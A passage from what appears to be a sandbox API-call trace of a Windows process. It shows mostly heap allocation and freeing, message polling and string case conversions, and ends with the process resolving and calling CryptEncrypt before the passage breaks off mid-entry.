hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.556] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.556] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.556] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.556] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.556] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.557] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.557] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.558] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.558] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.558] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.558] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.558] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.559] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.559] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.559] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.559] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.559] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.560] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.560] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.560] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.560] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.560] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34e2820 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24ab328, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.565] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b56a8 [0198.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.566] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x182dd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x182e0) returned 1 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0198.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: 